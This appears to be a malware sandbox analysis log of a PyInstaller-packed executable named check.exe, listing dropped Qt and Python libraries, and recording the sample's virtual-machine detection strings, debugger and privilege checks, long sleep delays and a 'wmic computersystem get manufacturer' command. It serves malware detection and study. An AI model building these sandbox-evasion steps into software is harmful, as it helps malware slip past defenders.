Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27922\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-17950
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeAPI coverage: 2.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7124F83C0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F9280 FindFirstFileExW,FindClose,4_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712511874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF712511874
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124F9280 FindFirstFileExW,FindClose,5_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF7124F83C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: check.exe, 00000005.00000003.2279631020.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD986E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
Source: check.exe, 00000004.00000003.2256005056.000001C184425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: check.exe, 00000005.00000002.2737284106.0000029FD96C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: nfQEMU
Source: check.exe, 00000005.00000002.2743640396.00007FF89E208000.00000008.00000001.01000000.00000024.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7124FD12C
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712513480 GetProcessHeap,4_2_00007FF712513480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7124FD12C
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FD30C SetUnhandledExceptionFilter,4_2_00007FF7124FD30C
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7124FC8A0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF71250A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF71250A614
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7124FD12C
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF89ECA2C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF89ECA2C90
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6C65D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF89A6C65D0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89BD32C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF89BD32C90
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89BD33248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF89BD33248
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C165D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF898C165D0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C16484 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FF898C16484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturerJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712519570 cpuid 4_2_00007FF712519570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
